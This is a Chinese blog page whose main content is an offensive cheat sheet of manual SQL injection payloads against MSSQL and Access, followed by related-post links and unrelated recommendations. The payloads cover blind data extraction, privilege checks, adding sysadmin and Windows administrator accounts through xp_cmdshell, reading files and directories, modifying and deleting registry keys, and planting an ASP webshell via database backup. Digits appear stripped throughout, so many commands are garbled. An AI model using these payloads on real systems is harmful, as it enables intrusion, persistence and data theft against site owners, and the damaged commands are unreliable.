.判断是否有注入;and = ;and =
  .初步判断是否是mssql ;and user>   .注入参数是字符and [查询条件] and =   .搜索时没过滤参数的and [查询条件] and %=   .判断数据库系统   ;and (select count(*) from sysobjects)> mssql   ;and (select count(*) from msysobjects)> access   .猜数据库 ;and (select Count(*) from [数据库名])>   .猜字段 ;and (select Count(字段名) from 数据库名)>   .猜字段中记录长度 ;and (select top len(字段名) from 数据库名)>   .()猜字段的ascii值(access)   ;and (select top asc(mid(字段名,,)) from 数据库名)>   ()猜字段的ascii值(mssql)   ;and (select top unicode(substring(字段名,,)) from 数据库名)>   .测试权限结构(mssql)   ;and =(select IS_SRVROLEMEMBER(sysadmin));--   ;and =(select IS_SRVROLEMEMBER(serveradmin));--   ;and =(select IS_SRVROLEMEMBER(setupadmin));--   ;and =(select IS_SRVROLEMEMBER(securityadmin));--   ;and =(select IS_SRVROLEMEMBER(diskadmin));--   ;and =(select IS_SRVROLEMEMBER(bulkadmin));--   ;and =(select IS_MEMBER(db_owner));--   .添加mssql和系统的帐户   ;exec master.dbo.sp_addlogin username;--
  ;exec master.dbo.sp_password null,username,password;--   ;exec master.dbo.sp_addsrvrolemember sysadmin username;--   ;exec master.dbo.xp_cmdshell net user username password   /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add;--   ;exec master.dbo.xp_cmdshell net user username password /add;--   ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;--   .()遍历目录   ;create table dirs(paths varchar(), id int)   ;insert dirs exec master.dbo.xp_dirtree c:   ;and (select top paths from dirs)>   ;and (select top paths from dirs where paths not in(上步得到的paths))>)   ()遍历目录   ;create table temp(id nvarchar(),num1 nvarchar(),num2 nvarchar(),num3 nvarchar());--
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表   ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树构   ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容   .mssql中的存储过程   xp_regenumvalues 注册表根键, 子键   ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值   xp_regread 根键,子键,键值名   ;exec xp_regread   HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值   xp_regwrite 根键,子键, 值名, 值类型, 值   值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   ;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表   xp_regdeletevalue 根键,子键,值名   exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值   xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值   .mssql的backup创建webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=c:l.asp;   .mssql内置函数   ;and (select @@version)> 获得Windows的版本号   ;and user_name()=dbo 判断当前系统的连接用户是不是sa   ;and (select user_name())> 爆当前系统的连接用户   ;and (select db_name())> 得到当前连接的数据库   .简洁的webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=g:wwwtestl.asp;

手动方式SQL注入脚本命令之精华版的更多相关文章

  1. SQL注入常用命令

    1. 数据库查询版本 Mssql select @@version Mysql select vresion()/select @@version oracle select banner from ...

  2. phpcms v9 sql注入脚本

    phpcms v9 SQL注入脚本 用法:python phpcms.py http://www.baidu.com import requests,sys,urllib url = sys.argv ...

  3. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  4. 安全测试5_服务端的安全漏洞(SQL注入、命令注入、文件操作类)

    前面大致讲解了下客户端的安全漏洞,现在来讲解下服务端的安全漏洞. 1.SQL注入(SQL Injection),是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库 ...

  5. 常规SQL注入脚本

    一:union报错注入 猜字段长度:order by 28 先显示位http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 当前数 ...

  6. SQL注入脚本(基于时间)

    #encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept' ...

  7. 禁用substr、substring、mid函数的sql注入脚本

    #encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = l ...

  8. SQL注入技术专题—由浅入深【精华聚合】

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23569276来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 不管用什么语言编写的Web应用 ...

  9. SQL注入学习资料总结

    转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html  什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Lang ...

随机推荐

  1. PHP表单-PHP $_POST 变量

    PHP $_POST 变量 在 PHP 中,预定义的 $_POST 变量用于收集来自 method="post" 的表单中的值. $_POST 变量 预定义的 $_POST 变量用 ...

  2. 谷歌地图api訪问失败

    在非外网情况下.我们调用谷歌api会出现载入不到地图的现象.此时能够换一下域名试试或许就好了 比方我自己訪问api时时这样写的: https://maps.googleapis.com/maps/ap ...

  3. SPOJ 74. Divisor Summation 分解数字的因子

    本题有两个难点: 1 大量的数据输入.没处理好就超时 - 这里使用buffer解决 2 因子分解的算法 a)暴力法超时 b)使用sieve(筛子),只是当中的算法逻辑也挺不easy搞对的. 数值N因子 ...

  4. 解决this web application instance has been stopped already

    重启tomcat的时候出错 Illegal access: this web application instance has been stopped already.  Could not loa ...

  5. linux sar命令详细说明相关参数

    详细说明linux的sar命令 sar(System Activity Reporter系统活动情况报告)是目前 Linux 上最为全面的系统性能分析工具之一,可以从多方面对系统的活动进行报告,包括: ...

  6. TRIZ系列-创新原理-25-自服务原理

    自服务原理的详细表述例如以下:1)物体在实施辅助和维修操作时.必须能自我服务:2)利用废弃的材料和能量: 自服务原理的第1)个比較好理解,假设一个系统在执行过程中须要进行辅助和维护操作时,最好不要借助 ...

  7. cpuinfo详解

    cat /proc/cpuinfo processor: 23:超线程技术的虚拟逻辑核第24个   ###一般看最后一个0...23 表示24线程 vendor_id: GenuineIntel:CP ...

  8. HDUOJ----2512一卡通大冒险

    一卡通大冒险 Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others)Total Subm ...

  9. HDUOJ---Can you solve this equation?

    Can you solve this equation? Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K ( ...

  10. O(n)复杂度求没有出现的数字(leetcode448)

    一个长度为N的数组,其中元素取值为1-N,求这个数组中没有出现的.1-N之间的数字. 要求无额外空间,O(n)时间复杂度. nums[i]=-1表示i数字已经出现过了 class Solution(o ...